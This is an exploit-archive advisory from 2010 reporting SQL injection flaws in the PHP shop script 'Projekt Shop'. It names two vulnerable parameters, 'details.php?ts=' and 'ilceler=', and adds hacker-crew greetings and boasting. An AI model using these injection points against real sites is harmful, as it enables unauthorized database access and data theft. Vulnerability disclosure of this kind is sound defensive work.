[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Projekt Shop (details.php) Multiple SQL injection Vulnerabilities
# Published : 2010-12-18
# Author : DeadLy DeMon
# Previous Title : Serendipity 1.5.4 0day Arbitrary File Upload Vulnerability
# Next Title : Vacation Rental Script v4.0 Arbitrary File Upload Vulnerability
+Name : Projekt Shop (details.php) <<= SQL injection Vulnerability
+Autor : DeadLy DeMon
+Date : 18.12.2010
+Script : Projekt Shop
+Download : ----
+Site : http://www.mhproducts.de/php-scripte-5/projekt-shop.html
+Price : 49,90 Euro
+Language : PHP
+Tests : Windows XP SP 3 and Backtrack4 any other OS
+Discovered by DeadLy DeMon
+ Cyber - Warrior TIM =>> www.cyber-warrior.org
+Greetz to All System-Hacker, BlackApple , F0RTYS3V3N and All KinqSqlZCrew
Members
---------------------------------------------------------------------------------------
Bize kafa tutarm?? b¨¹y¨¹k hacker,
Kimlik ya?? 18 ak?l ya?? 1 sen giderken biz d?n¨¹yoduk
Sen emzikle emeklerken biz exploit yaz?yoduk :))
KinqSqlZCrew Akar.... Akl?n?za Gideriz Akl?n?z Gider [ Akl? olmayanlar
al?nmas?n sonra kar???yor :D ]
----------------------------------------------------------------------------------------
Bug ;
target/path/details.php?ts=' [Sql Inj.]
target/path/?sayfa=arama&iller=&ilceler=[SQL INJ]
---------------------------------------------------------------------------------------